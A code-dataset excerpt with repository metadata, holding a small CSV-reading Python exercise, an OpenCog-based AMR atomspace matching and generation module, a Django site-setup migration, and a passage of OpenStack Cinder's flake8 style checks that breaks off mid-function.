Data science/Analise de dados/exercicio python/Exemplo01.py
|
Andrelirao/aulas-graduacao
|
c7e8ebf1ad6b5309720bab9ea0a2472d153cd169
|
[
"MIT"
] | 10
|
2020-05-19T23:23:29.000Z
|
2021-09-07T13:49:58.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 17 08:39:11 2020
@author: luisc
"""
import csv
arquivo = open('titanic.csv');
linhas = csv.reader(arquivo);
for linha in linhas:
print(linha)
| 12.375
| 35
| 0.636364
|
76e1792b5f47d6d8a073f3cf1c71e3c950522974
| 30,684
|
py
|
Python
|
amratom/space.py
|
arturgontijo/singnet-das
|
e92f6e4818687b35e33bb78c13eb843badf28383
|
[
"MIT"
] | null | null | null |
amratom/space.py
|
arturgontijo/singnet-das
|
e92f6e4818687b35e33bb78c13eb843badf28383
|
[
"MIT"
] | null | null | null |
amratom/space.py
|
arturgontijo/singnet-das
|
e92f6e4818687b35e33bb78c13eb843badf28383
|
[
"MIT"
] | null | null | null |
import logging
import io
import random
import re
from copy import deepcopy
from contextlib import contextmanager
from opencog.atomspace import create_child_atomspace, Atom
from opencog.utilities import push_default_atomspace, pop_default_atomspace
from opencog.type_constructors import *
from opencog.bindlink import execute_atom
from amratom.triples import (TripleProcessor, PatternInstanceDict, AmrInstanceDict,
is_amr_set, is_const)
from amratom.atomese import (amr_value_atom, amr_concept_atom, TYPED_VAR, EVAL, TRUE,
FALSE, child_atomspace, default_atomspace)
from amratom.types import *
@contextmanager
def child_amr_atomspace(parent):
"""
Context manager which creates a child AMR atomspace of the passed one.
"""
amr_space = parent.child()
push_default_atomspace(amr_space.atomspace)
try:
yield amr_space
finally:
pop_default_atomspace()
class AmrAtomspace:
def __init__(self, atomspace):
self.log = logging.getLogger(__name__ + '.' + type(self).__name__)
self.atomspace = atomspace
def child(self):
atomspace = create_child_atomspace(self.atomspace)
return AmrAtomspace(atomspace)
def add_triple(self, triple):
with default_atomspace(self.atomspace):
self.log.debug('add_triple: %s', triple)
source, role, target = triple
top_atom = amr_value_atom(source)
if role == ':instance':
AmrInstanceLink(top_atom, amr_concept_atom(target))
else:
if role.endswith("?"):
role = role[:-1]
optional = True
else:
optional = False
role_atom = AmrRole(role)
EvaluationLink(role_atom,
ListLink(
top_atom,
amr_value_atom(target)))
EvaluationLink(PredicateNode("is-optional"),
ListLink(top_atom, role_atom, amr_value_atom(target)),
tv=TRUE if optional else FALSE)
source_amr_concept = self.get_concepts_of_instance(top_atom)
if len(source_amr_concept) > 0 and source_amr_concept[0].is_a(types.AmrConcept):
EvaluationLink(PredicateNode("has-role"),
ListLink(source_amr_concept[0], role_atom))
def get_concept_instances(self, amr_concept):
with child_atomspace(self.atomspace) as atomspace:
# We don't apply type constraints on VariableNode("instance") here.
# Any type-checking should be used outside (e.g. one may want to
# detect unexpected types as KB errors)
# TODO? variable type can be added as an optional argument once needed
return execute_atom(atomspace,
GetLink(AmrInstanceLink(VariableNode("instance"), amr_concept))).out
def get_concepts_of_instance(self, amr_instance):
with child_atomspace(self.atomspace) as atomspace:
results = execute_atom(atomspace,
GetLink(AmrInstanceLink(amr_instance, VariableNode("concept")))).out
if len(results) > 1:
self.log.debug('get_concepts_of_instance: WARNING - multiple AmrInstanceLinks for %s', amr_instance.name)
return results
def get_relations(self, pred, arg0, arg1, var_types=None):
with child_atomspace(self.atomspace) as atomspace:
if var_types is not None:
vars = []
for arg, types in var_types.items():
if types is None:
vars.append(VariableNode(arg))
else:
types = types if isinstance(types, list) else [ types ]
vars.append(TYPED_VAR(arg, types))
results = execute_atom(atomspace,
GetLink(VariableList(*vars),
EvaluationLink(pred, ListLink(arg0, arg1))))
else:
results = execute_atom(atomspace,
GetLink(EvaluationLink(pred, ListLink(arg0, arg1))))
return [r.out if r.is_link() else r for r in results.out]
def get_concept_roles(self, arg0, arg1, var_types=None):
return self.get_relations(PredicateNode("has-role"), arg0, arg1, var_types)
def get_instance_roles(self, amr_instance):
return [self.get_relations(VariableNode("role"), amr_instance, VariableNode("right-inst"),
{"role": "AmrRole", "right-inst": None}),
self.get_relations(VariableNode("role"), VariableNode("left-inst"), amr_instance,
{"role": "AmrRole", "left-inst": None})]
def get_amrsets_by_concept(self, concept):
with child_atomspace(self.atomspace) as atomspace:
amrsets = []
results = execute_atom(atomspace, GetLink(
VariableList(
TypedVariableLink(VariableNode("amrset"),
TypeNode("AmrSet")),
TypedVariableLink(VariableNode("amrset-instance"),
TypeNode("AmrValue")),
VariableNode("concept")),
AndLink(
EvaluationLink(AmrRole(":amr-set"),
ListLink(VariableNode("amrset"),
VariableNode("amrset-instance"))),
AmrInstanceLink(VariableNode("amrset-instance"),
VariableNode("concept"))
)))
for x in results.out:
amrset, amrset_instance, concept_candidate = x.out
if concept_candidate.is_a(types.AmrVariable):
amrsets.append((amrset, amrset_instance))
elif concept_candidate.is_a(types.AmrSet):
amrsets.append((amrset, amrset_instance))
elif concept is not None and match_concept(concept, concept_candidate):
amrsets.append((amrset, amrset_instance))
return amrsets
def get_concept(self, concept):
with child_atomspace(self.atomspace) as atomspace:
results = execute_atom(atomspace, GetLink(
VariableList(
TypedVariableLink(VariableNode("parent"),
TypeChoice(
TypeNode("AmrConcept"),
TypeNode("AmrVariable"),
TypeNode("AmrSet")))),
AndLink(AmrInstanceLink(concept, VariableNode("parent")))
))
return results.out[0] if len(results.out) > 0 else None
_meaning_postfix_pattern = re.compile(r'-\d+$')
def match_concept(input, template):
if _meaning_postfix_pattern.search(template.name) is not None:
# the template specifies an exact meaning
return input.name == template.name
else:
meaning_pos = _meaning_postfix_pattern.search(input.name)
if meaning_pos is None:
return input.name == template.name
else:
return input.name[:meaning_pos.start(0)] == template.name
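# Self-contained sketch of match_concept's postfix handling. Real callers pass Atoms;
# a stand-in with a .name attribute is enough to show the matching rules.
def _example_match_concept():
    from collections import namedtuple
    FakeConcept = namedtuple('FakeConcept', 'name')
    # A template without a "-NN" meaning postfix matches any meaning of the lemma.
    assert match_concept(FakeConcept('run-01'), FakeConcept('run'))
    # A template with an explicit meaning requires an exact match.
    assert match_concept(FakeConcept('run-01'), FakeConcept('run-01'))
    assert not match_concept(FakeConcept('run-02'), FakeConcept('run-01'))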
class AmrMatch:
def __init__(self, amrset, vars={}):
self.amrset = amrset
self.vars = vars
def __repr__(self):
return ('{ amrset: ' + repr(self.amrset) + ', vars: ' +
repr(self.vars) + ' }')
def __eq__(self, other):
return self.amrset == other.amrset and self.vars == other.vars
class AmrMatcher:
def __init__(self, space):
self.log = logging.getLogger(__name__ + '.' + type(self).__name__)
self.space = space
def match_amr_set(self, input_value, template_value, amrset):
self.log.debug("match_amr_set: input_value: %s, template_value: %s, amrset: %s",
input_value, template_value, amrset)
matches = []
for candidate in self.space.get_relations(AmrRole(":amr-set"), amrset, VariableNode("target")):
for match in self.match_amr_trees(input_value, candidate,
amrset_instance=template_value):
matches.append({ amrset: match })
return matches
def match_amr_trees(self, input_value, template_value, amrset_instance=None):
# match values
self.log.debug('match_amr_trees: input_value: %s, template_value: %s'
+ ', amrset_instance: %s', input_value, template_value,
amrset_instance)
if (input_value == template_value):
return [{}]
if template_value.is_a(types.AmrVariable):
matches = list(self.match_value(input_value))
if len(matches) == 0:
# instance AmrVariable
return [{ template_value: input_value }]
else:
result = []
for match in matches:
result.append({ template_value: { match.amrset: match.vars } })
return result
# match concepts
input_concept = self.space.get_concept(input_value)
template_concept = self.space.get_concept(template_value)
self.log.debug('match_amr_trees: input_concept: %s template_concept: %s',
input_concept, template_concept)
match = {}
if (input_concept is None and template_concept is None):
self.log.debug('match_amr_trees: different attributes')
return []
elif template_concept is None:
self.log.debug('match_amr_trees: template concept is None and input concept is not')
return []
elif input_concept is None:
self.log.debug('match_amr_trees: input concept is None and template concept is not')
return []
elif template_concept.is_a(types.AmrSet):
# hierarchical template
return self.match_amr_set(input_value, template_value,
template_concept)
elif template_concept.is_a(types.AmrVariable):
# parent AnchorNode
match[template_concept] = input_concept
elif not match_concept(input_concept, template_concept):
self.log.debug('match_amr_trees: different concepts')
return []
# match roles
return self.match_amr_roles(input_value, template_value, match,
amrset_instance)
class RoleMetadata:
def __init__(self, role):
self.role = role
self.targets = []
def match_amr_roles(self, input_value, template_value, match,
amrset_instance=None):
self.log.debug('match_amr_roles: input_value: %s, template_value: %s'
+ ', amrset_instance: %s', input_value, template_value,
amrset_instance)
input_roles = {}
for role, target in self.space.get_relations(VariableNode("role"),
input_value, VariableNode("target"),
{ "role": "AmrRole", "target": None }):
if role not in input_roles:
input_roles[role] = set()
input_roles[role].add(target)
template_roles = {}
for role, target in self.space.get_relations(VariableNode("role"),
template_value, VariableNode("target"),
{ "role": "AmrRole", "target": None }):
if role not in template_roles:
template_roles[role] = self.RoleMetadata(role)
template_roles[role].targets.append((template_value, target))
if amrset_instance is not None:
for role, target in self.space.get_relations(VariableNode("role"),
amrset_instance, VariableNode("target"),
{ "role": "AmrRole", "target": None }):
if role.name == ':amr-set':
continue
if role not in template_roles:
template_roles[role] = self.RoleMetadata(role)
template_roles[role].targets.append((amrset_instance, target))
matches = [ match ]
absent_input_roles = set()
absent_template_roles = set(template_roles.keys())
has_role_wildcard = AmrRole(":*") in template_roles
for role in input_roles:
if role in template_roles:
absent_template_roles.remove(role)
else:
if role.name == ':pos' or has_role_wildcard:
continue
else:
absent_input_roles.add(role)
continue
for next_input_value in input_roles[role]:
for source, next_template_value in template_roles[role].targets:
new_matches = []
for res in self.match_amr_trees(next_input_value,
next_template_value):
for prev_match in matches:
new_match = prev_match.copy()
new_match.update(res)
new_matches.append(new_match)
# Here we stop on the first possible match for the role.
# There are may be other options to match role targets in
# other sequence, but we ignore this for now.
if len(new_matches) > 0:
template_roles[role].targets.remove((source, next_template_value))
break
matches = new_matches
if len(matches) == 0:
self.log.debug('match_amr_roles: no match input for role: '
+ '%s, value: %s, template_targets: %s',
role, next_input_value, template_roles[role].targets)
return []
absent_mandatory_roles = self.get_mandatory_roles(template_roles[role])
if len(absent_mandatory_roles) > 0:
self.log.debug("match_amr_roles: non optional template roles are " +
"absent in input_value: %s", absent_mandatory_roles)
return []
if len(absent_input_roles) > 0:
self.log.debug("match_amr_roles: input_value has roles which are " +
"not present in template_value: %s", absent_input_roles)
return []
for role in absent_template_roles:
absent_mandatory_roles = self.get_mandatory_roles(template_roles[role])
if len(absent_mandatory_roles) > 0:
self.log.debug("match_amr_roles: non optional template roles are " +
"absent in input_value: %s", absent_mandatory_roles)
return []
self.log.debug('match_amr_roles: matches found, vars: %s', matches)
return matches
def get_mandatory_roles(self, role_metadata):
mandatory_roles = []
for source, target in role_metadata.targets:
optional = self.is_optional_role(source, role_metadata.role, target)
if not optional:
mandatory_roles.append((role_metadata.role, source, target))
return mandatory_roles
def is_optional_role(self, template_value, role, target):
return (role == AmrRole(":*") or
EvaluationLink(PredicateNode("is-optional"),
ListLink(template_value, role, target)).tv == TRUE)
def match_value(self, value):
concept = self.space.get_concept(value)
self.log.debug("match_value: value: %s, concept: %s", value, concept)
for amrset, amrset_var in self.space.get_amrsets_by_concept(concept):
self.log.debug('match_value: try amrset: %s, instance: %s', amrset, amrset_var)
for match in self.match_amr_trees(value, amrset_var):
self.log.debug("match_value: found match: %s", match)
yield AmrMatch(amrset, match)
_single_word_pattern = re.compile(r'^\S+$')
class AmrTemplateInstance:
def __init__(self, match=None):
self.vars = {}
self.subint = []
if match:
self.amrset = match.amrset.name
self.subint, self.vars = self._unwrap_vars_rec(match.vars)
def _unwrap_vars_rec(self, vs):
subint = []
vacc = {}
for key, value in vs.items():
if isinstance(key, Atom) and key.name != '*':
if key.is_a(types.AmrSet):
subint_child, vacc_child = self._unwrap_vars_rec(value)
subint += [key.name] + subint_child
# Storing all subintent variables as a value for subintent
if len(vacc_child) > 0:
vacc[key.name] = vacc_child
# And also duplicate them in a flatten dict for convenience
vacc.update(vacc_child)
else:
assert key.is_a(types.AmrVariable), "Unsupported variable {0}".format(key)
vname = None
if isinstance(value, Atom):
vname = value.name
if vname.startswith('"') and vname.endswith('"'):
vname = vname[1:-1]
elif isinstance(value, dict):
vkey = list(value.keys())[0]
assert len(value) == 1 and isinstance(vkey, Atom) and vkey.is_a(types.AmrSet), \
"Expected only one AmrSet as variable value: {0} - {1}".format(key, value)
vname = vkey.name
subint_child, vacc_child = self._unwrap_vars_rec(value[vkey])
subint += [vname] + subint_child
if len(vacc_child) > 0:
vname = {vname: vacc_child}
vacc.update(vacc_child)
vacc[key.name] = vname
return subint, vacc
@classmethod
def from_values(cls, amrset, vars=None, subint=None):
inst = cls()
inst.amrset = amrset
inst.vars = deepcopy(vars) if vars is not None else {}
inst.subint = subint if subint is not None else []
return inst
def __repr__(self):
return ('{ amrset: ' + self.amrset + ', vars: ' +
repr(self.vars) + ' }' + ', subint: ' + repr(self.subint))
def __eq__(self, other):
return self.amrset == other.amrset and self.vars == other.vars and \
self.subint == other.subint
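# Hedged usage sketch for AmrTemplateInstance.from_values; the amrset, variable, and
# subintent names are hypothetical.
def _example_template_instance():
    inst = AmrTemplateInstance.from_values(
        '@greeting', vars={'$name': 'John'}, subint=['@greet-person'])
    # Equality compares amrset, vars and subint, so an identical instance matches.
    assert inst == AmrTemplateInstance.from_values(
        '@greeting', vars={'$name': 'John'}, subint=['@greet-person'])
    return inst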
class PatternParser:
def __init__(self, amr_proc, amr_space):
self.log = logging.getLogger(__name__ + '.' + type(self).__name__)
self.amr_proc = amr_proc
self.amr_space = amr_space
self.triple_proc = TripleProcessor(PatternInstanceDict)
self.utterance_parser = UtteranceParser(amr_proc, amr_space)
def parse(self, amr):
with default_atomspace(self.amr_space.atomspace):
parsed_amr = self.triple_proc.amr_to_triples(amr)
self._process_triples(parsed_amr)
return amr_value_atom(parsed_amr.top)
def load_file(self, file):
self._process_triples(self.triple_proc.file_to_triples(file))
def load_text(self, text):
with io.StringIO(text) as file:
self.load_file(file)
def _process_triples(self, triples):
for triple in triples:
if is_amr_set(triple) and is_const(triple[2]):
source, role, target = triple
no_quotes = target[1:-1]
if _single_word_pattern.search(no_quotes) is not None:
self.amr_space.add_triple(triple)
else:
top = self.utterance_parser.parse_sentence(no_quotes)
self.amr_space.add_triple((source, role, top.name))
else:
self.amr_space.add_triple(triple)
class UtteranceParser:
def __init__(self, amr_proc, amr_space):
self.log = logging.getLogger(__name__ + '.' + type(self).__name__)
self.amr_proc = amr_proc
self.amr_space = amr_space
self.triple_proc = TripleProcessor(AmrInstanceDict)
# FIXME: NB: to get unique variable names we need to import all
# triples into triple_proc before processing
self.triple_proc.next_id = 500000
def parse(self, text):
with default_atomspace(self.amr_space.atomspace):
sentences = []
amrs = self.amr_proc.utterance_to_amr(text)
for amr in amrs:
parsed_amr = self.triple_proc.amr_to_triples(amr)
for triple in parsed_amr:
self.amr_space.add_triple(triple)
sentences.append(amr_value_atom(parsed_amr.top))
return sentences
def parse_sentence(self, text):
sentences = self.parse(text)
assert len(sentences) == 1, 'Single sentence is expected as input'
return sentences[0]
class AmrGenerator:
def __init__(self, amr_space, amr_proc):
self.log = logging.getLogger(__name__ + '.' + type(self).__name__)
self.amr_space = amr_space
self.amr_proc = amr_proc
def recSubst(self, atom):
bSubst = True
with child_atomspace(self.amr_space.atomspace) as atomspace:
while bSubst and atom:
bSubst = False
if atom.is_a(types.AmrVariable):
if atom.name == '*':
# Just ignore wildcards since we can't guess their content
self.log.debug("recSubst: ignore *")
atom = None
else:
subst = execute_atom(atomspace,
GetLink(StateLink(atom, VariableNode("$state")))).out
for s in subst:
if not s.is_a(types.VariableNode):
if bSubst:
self.log.debug('recSubst: WARNING - additional value %s', s.name)
else:
self.log.debug('recSubst: AmrVariable %s --> %s', atom.name, s.name)
atom = s
bSubst = True
if not bSubst:
self.log.debug('recSubst: WARNING - no value for AmrVariable %s', atom.name)
else:
# Check if atom refers to AmrSet (set of tops of amr graphs)
amr_set = execute_atom(atomspace,
GetLink(EVAL(AmrRole(":amr-set"), atom, VariableNode("$top")))).out
if not atom.is_a(types.AmrSet) and len(amr_set) > 0:
self.log.debug('recSubst: WARNING - non-AmrSet atom %s has :amr-set role', atom.name)
if atom.is_a(types.AmrSet) and len(amr_set) == 0:
self.log.debug('recSubst: WARNING - AmrSet atom %s has no :amr-set role', atom.name)
if len(amr_set) > 0:
# Just choose randomly now. A more advanced strategy could be
# to filter out subgraphs from amr-set with AmrVariable lacking StateLinks
s = amr_set[random.randint(0, len(amr_set)-1)]
self.log.debug('recSubst: :amr-set substitution %s --> %s', atom.name, s.name)
atom = s
bSubst = True
return atom
def triplesFromFullGraph(self, topAtom):
self.log.debug('triplesFromFullGraph: generating %s', topAtom.name if topAtom else None)
topAtom = self.recSubst(topAtom)
triples = []
if not topAtom: return triples
parentName = parent = None
# identify parent name with substitutions
if topAtom.is_a(types.AmrValue):
pa = self.amr_space.get_concepts_of_instance(topAtom)
if len(pa) > 0:
# If the parent explicitly refers to an AmrSet, AmrSet will
# be sampled, and AmrValue will appear as a parent.
# It is difficult to track such situations in case of other
# recursive substitutions (e.g. with variables), so we simply assume
# that the situation of an AmrValue as the parent is valid and implies
# the necessity to merge two graphs referring to these AmrValues.
parent = self.recSubst(pa[0])
parentName = parent.name
children, _ = self.amr_space.get_instance_roles(topAtom)
connections = []
for child in children:
self.log.debug('triplesFromFullGraph: child %s %s %s', topAtom.name, child[0].name, child[1].name)
# Fixme? recSubst will be called second time for topAtom in recursion
# It's not a huge problem since it will do nothing, although it will generate warnings twice
atom2 = self.recSubst(child[1])
if not atom2 or atom2.is_a(types.VariableNode) or atom2.is_a(types.AmrVariable):
# TODO? Maybe, we need raise an exception for a non-optional role
continue
if child[0].name == ':pos':
# we consider :pos connected to constant attributes only now
if parentName:
parentName += "~"+atom2.name.replace("\"", "")
else:
self.log.debug('triplesFromFullGraph: WARNING - cannot add pos tag to %s', topAtom.name)
elif child[0].name == ':*':
self.log.debug('triplesFromFullGraph: ignoring :*')
continue
else:
# We don't consider optional roles here. They are represented by PredicateNode("is-optional")
# which is ignored here, and full graph is reconstructed.
# Controlling how to deal with optional roles in the generator can be added in future.
connections += [(topAtom.name, child[0].name, atom2)]
if parentName:
self.log.debug('triplesFromFullGraph: topAtom %s / %s', topAtom.name, parentName)
if parent.is_a(types.AmrConcept):
# topAtom is just an instance of AmrConcept
triples += [(topAtom.name, ":instance", parentName)]
elif parent.is_a(types.AmrVariable):
assert False, "AmrVariable {0} is not set".format(parent.name)
else:
assert parent.is_a(types.AmrValue), "Unexpected type of {0} after recSubst".format(parent.name)
# Generating subgraph to be merged
side_triples = self.triplesFromFullGraph(parent)
if len(side_triples) > 0:
for triple in side_triples:
if triple[0] == parentName:
# Substituting current top in place of the top of the graph to be merged
triples += [(topAtom.name, triple[1], triple[2])]
else:
triples += [triple]
# In case of (@game-name :amr-set "Bingo"), generateFull(AmrSet("@game-name")) will
# return an empty graph, because there are no triples. Generating single attribute value
# is not supported.
# elif len(connections) == 0:
# triples += [(topAtom.name, ':instance', None)]
# Just sorting alphabetically works reasonably well: :ARG0,1,2 go first
connections = sorted(connections, key = lambda n: n[1])
for c in connections:
child_triple = self.triplesFromFullGraph(c[2])
if len(child_triple) == 0:
# The special case of amr attribute that substitutes amr value.
# E.g. for (@game :amr-set "Bingo"), (name :op1 @game), we will have
# n / name pointing to g / @game, so we need to peek into g's parent
# to understand that we need not (n :op1 g) with triples for g,
# but (n :op1 "Bingo"), where "Bingo" is recSubst of g's parent.
parent2 = self.amr_space.get_concepts_of_instance(c[2])
if len(parent2) > 0:
parent2 = self.recSubst(parent2[0])
if parent2 is not None:
triples += [(c[0], c[1], parent2.name)]
continue
new_triples = [(c[0], c[1], c[2].name)] + child_triple
for tn in new_triples:
isNew = True
for tp in triples:
if tp[0] == tn[0] and tp[1] == tn[1]:
isNew = False
if tp[2] != tn[2] or tp[1] != ':instance':
self.log.debug('triplesFromFullGraph: WARNING - conflicting (%s %s %s) (%s %s %s)',
tp[0], tp[1], tp[2], tn[0], tn[1], tn[2])
if tp[2] != tn[2] and tp[1] != ':instance':
# "Do you have any other questions for me?" contains
# `:mod (o / other)` and `:mod (a2 / any)` simultaneously
isNew = True
# else do nothing - it is expected for :instance
if isNew:
triples += [tn]
return triples
def renameInsts(self, triples):
names = [t[0] for t in triples] + [t[2] for t in triples]
for i in range(len(triples)):
t = triples[i]
if t[1] != ':instance': continue
oldName = t[0]
newName = t[2][0] # oldName[0] also works, but it can produce w/i, when what-0015/$what is in graph
while newName in names:
if len(newName) == 1:
newName += newName[0]
elif len(newName) == 2:
newName += 'a'
else:
newName = newName[0:2] + chr(ord(newName[2])+1)
for j in range(len(triples)):
if triples[j][0] == oldName: triples[j] = (newName, triples[j][1], triples[j][2])
if triples[j][2] == oldName: triples[j] = (triples[j][0], triples[j][1], newName)
names += [newName]
return triples
def generateFull(self, topAtom):
triples = self.triplesFromFullGraph(topAtom)
r = self.renameInsts(triples)
text = self.amr_proc.triples_to_utterance(r) if r != [] else None
if text is None:
self.log.debug('generateFull: WARNING - No graph for topAtom %s', topAtom.name)
return text
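    # A small worked illustration (invented triples, not from any corpus) of the
    # renaming performed by renameInsts above: each instance variable is replaced
    # by the first letter of its concept and extended on collision ('w', 'ww',
    # 'wwa', 'wwb', ...), and every reference is rewritten accordingly:
    #     self.renameInsts([('what-0015', ':instance', 'what'),
    #                       ('want-01-0003', ':instance', 'want-01'),
    #                       ('want-01-0003', ':ARG1', 'what-0015')])
    #     # -> [('w', ':instance', 'what'),
    #     #     ('ww', ':instance', 'want-01'),
    #     #     ('ww', ':ARG1', 'w')]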
| 46.77439
| 111
| 0.559249
|
5554a1593e734bb5a814947adb5878e8049db65d
| 526
|
py
|
Python
|
backend/home/migrations/0001_load_initial_data.py
|
crowdbotics-apps/lokl-30054
|
4ee7f41bc8ab7b55ea06e273b4764ee7bff5fd43
|
[
"FTL",
"AML",
"RSA-MD"
] | null | null | null |
backend/home/migrations/0001_load_initial_data.py
|
crowdbotics-apps/lokl-30054
|
4ee7f41bc8ab7b55ea06e273b4764ee7bff5fd43
|
[
"FTL",
"AML",
"RSA-MD"
] | 10
|
2021-08-29T22:26:13.000Z
|
2022-03-20T15:31:39.000Z
|
backend/home/migrations/0001_load_initial_data.py
|
crowdbotics-apps/lokl-30054
|
4ee7f41bc8ab7b55ea06e273b4764ee7bff5fd43
|
[
"FTL",
"AML",
"RSA-MD"
] | null | null | null |
from django.db import migrations
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "lokl-30054.botics.co"
site_params = {
"name": "lokl",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_site),
]
| 20.230769
| 61
| 0.65019
|
3494c6ef31fd8f39c3ab276723124d5dd8672026
| 14,111
|
py
|
Python
|
cinder/tests/hacking/checks.py
|
cloudification-io/cinder
|
23d76e01f2b4f3771b57fb287084a4884238b827
|
[
"Apache-2.0"
] | 571
|
2015-01-01T17:47:26.000Z
|
2022-03-23T07:46:36.000Z
|
cinder/tests/hacking/checks.py
|
dFarui/cinder
|
b2922384054ddbd46e071fd07372a75a21d7f85d
|
[
"Apache-2.0"
] | 37
|
2015-01-22T23:27:04.000Z
|
2021-02-05T16:38:48.000Z
|
cinder/tests/hacking/checks.py
|
dFarui/cinder
|
b2922384054ddbd46e071fd07372a75a21d7f85d
|
[
"Apache-2.0"
] | 841
|
2015-01-04T17:17:11.000Z
|
2022-03-31T12:06:51.000Z
|
# Copyright (c) 2014 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import re
from hacking import core
"""
Guidelines for writing new hacking checks
- Use only for Cinder specific tests. OpenStack general tests
should be submitted to the common 'hacking' module.
- Pick numbers in the range N3xx. Find the current test with
the highest allocated number and then pick the next value.
- Keep the test method code in the source file ordered based
on the N3xx value.
- List the new rule in the top level HACKING.rst file
- Add test cases for each new rule to
cinder/tests/unit/test_hacking.py
"""
# NOTE(thangp): Ignore N323 pep8 error caused by importing cinder objects
UNDERSCORE_IMPORT_FILES = ['cinder/objects/__init__.py',
'cinder/objects/manageableresources.py']
mutable_default_args = re.compile(r"^\s*def .+\((.+=\{\}|.+=\[\])")
translated_log = re.compile(
r"(.)*LOG\.(audit|debug|error|info|warn|warning|critical|exception)"
r"\(\s*_\(\s*('|\")")
string_translation = re.compile(r"(.)*_\(\s*('|\")")
underscore_import_check = re.compile(r"(.)*i18n\s+import(.)* _$")
underscore_import_check_multi = re.compile(r"(.)*i18n\s+import(.)* _, (.)*")
# We need this for cases where they have created their own _ function.
custom_underscore_check = re.compile(r"(.)*_\s*=\s*(.)*")
no_print_statements = re.compile(r"\s*print\s*\(.+\).*")
dict_constructor_with_list_copy_re = re.compile(r".*\bdict\((\[)?(\(|\[)")
logging_instance = re.compile(
r"(.)*LOG\.(warning|info|debug|error|exception)\(")
assert_True = re.compile(
r".*assertEqual\(True, .*\)")
class BaseASTChecker(ast.NodeVisitor):
"""Provides a simple framework for writing AST-based checks.
Subclasses should implement visit_* methods like any other AST visitor
implementation. When they detect an error for a particular node the
method should call ``self.add_error(offending_node)``. Details about
where in the code the error occurred will be pulled from the node
object.
Subclasses should also provide a class variable named CHECK_DESC to
be used for the human readable error message.
"""
def __init__(self, tree, filename):
"""This object is created automatically by pep8.
:param tree: an AST tree
:param filename: name of the file being analyzed
(ignored by our checks)
"""
self._tree = tree
self._errors = []
def run(self):
"""Called automatically by pep8."""
self.visit(self._tree)
return self._errors
def add_error(self, node, message=None):
"""Add an error caused by a node to the list of errors for pep8."""
# Need to disable pylint check here as it doesn't catch CHECK_DESC
# being defined in the subclasses.
message = message or self.CHECK_DESC # pylint: disable=E1101
error = (node.lineno, node.col_offset, message, self.__class__)
self._errors.append(error)
def _check_call_names(self, call_node, names):
if isinstance(call_node, ast.Call):
if isinstance(call_node.func, ast.Name):
if call_node.func.id in names:
return True
return False
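# A minimal sketch of how a BaseASTChecker subclass is written, following the
# docstring above: visit_* methods inspect nodes and call self.add_error() on a
# violation. The rule number C399 and the eval() rule are invented here purely
# for illustration; this is not one of the registered Cinder checks.
class ExampleNoEvalChecker(BaseASTChecker):
    """Illustrative only: flag direct calls to the built-in eval()."""
    name = 'example_no_eval'
    version = '1.0'
    CHECK_DESC = 'C399 (hypothetical) eval() should not be used.'
    def visit_Call(self, node):
        # _check_call_names() is True when the call is a plain Name call
        # whose id is in the given list, e.g. eval(...)
        if self._check_call_names(node, ['eval']):
            self.add_error(node)
        return self.generic_visit(node)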
@core.flake8ext
def no_translate_logs(logical_line, filename):
"""Check for 'LOG.*(_('
Starting with the Pike series, OpenStack no longer supports log
translation. We shouldn't translate logs.
- This check assumes that 'LOG' is a logger.
- Use filename so we can start enforcing this in specific folders
instead of needing to do so all at once.
C312
"""
if translated_log.match(logical_line):
yield(0, "C312: Log messages should not be translated!")
@core.flake8ext
def no_mutable_default_args(logical_line):
msg = "N322: Method's default argument shouldn't be mutable!"
if mutable_default_args.match(logical_line):
yield (0, msg)
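# For instance (invented input, mirroring the unit tests mentioned in the module
# docstring), the logical-line checks are plain generators over a single line:
#     list(no_mutable_default_args("def foo(bar={}):"))
#     # -> [(0, "N322: Method's default argument shouldn't be mutable!")]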
@core.flake8ext
def check_explicit_underscore_import(logical_line, filename):
"""Check for explicit import of the _ function
We need to ensure that any files that are using the _() function
to translate messages are explicitly importing the _ function. We
can't trust unit test to catch whether the import has been
added so we need to check for it here.
"""
# Build a list of the files that have _ imported. No further
# checking needed once it is found.
for file in UNDERSCORE_IMPORT_FILES:
if file in filename:
return
if (underscore_import_check.match(logical_line) or
underscore_import_check_multi.match(logical_line) or
custom_underscore_check.match(logical_line)):
UNDERSCORE_IMPORT_FILES.append(filename)
elif string_translation.match(logical_line):
yield(0, "N323: Found use of _() without explicit import of _ !")
class CheckLoggingFormatArgs(BaseASTChecker):
"""Check for improper use of logging format arguments.
LOG.debug("Volume %s caught fire and is at %d degrees C and climbing.",
('volume1', 500))
The format arguments should not be a tuple as it is easy to miss.
"""
name = 'check_logging_format_args'
version = '1.0'
CHECK_DESC = 'C310 Log method arguments should not be a tuple.'
LOG_METHODS = [
'debug', 'info',
'warn', 'warning',
'error', 'exception',
'critical', 'fatal',
'trace', 'log'
]
    def _find_name(self, node):
        """Return the fully qualified name of a Name or Attribute."""
if isinstance(node, ast.Name):
return node.id
elif (isinstance(node, ast.Attribute)
and isinstance(node.value, (ast.Name, ast.Attribute))):
method_name = node.attr
obj_name = self._find_name(node.value)
if obj_name is None:
return None
return obj_name + '.' + method_name
elif isinstance(node, str):
return node
else: # could be Subscript, Call or many more
return None
def visit_Call(self, node):
"""Look for the 'LOG.*' calls."""
# extract the obj_name and method_name
if isinstance(node.func, ast.Attribute):
obj_name = self._find_name(node.func.value)
if isinstance(node.func.value, ast.Name):
method_name = node.func.attr
elif isinstance(node.func.value, ast.Attribute):
obj_name = self._find_name(node.func.value)
method_name = node.func.attr
else: # could be Subscript, Call or many more
return super(CheckLoggingFormatArgs, self).generic_visit(node)
# obj must be a logger instance and method must be a log helper
if (obj_name != 'LOG'
or method_name not in self.LOG_METHODS):
return super(CheckLoggingFormatArgs, self).generic_visit(node)
# the call must have arguments
if not len(node.args):
return super(CheckLoggingFormatArgs, self).generic_visit(node)
# any argument should not be a tuple
for arg in node.args:
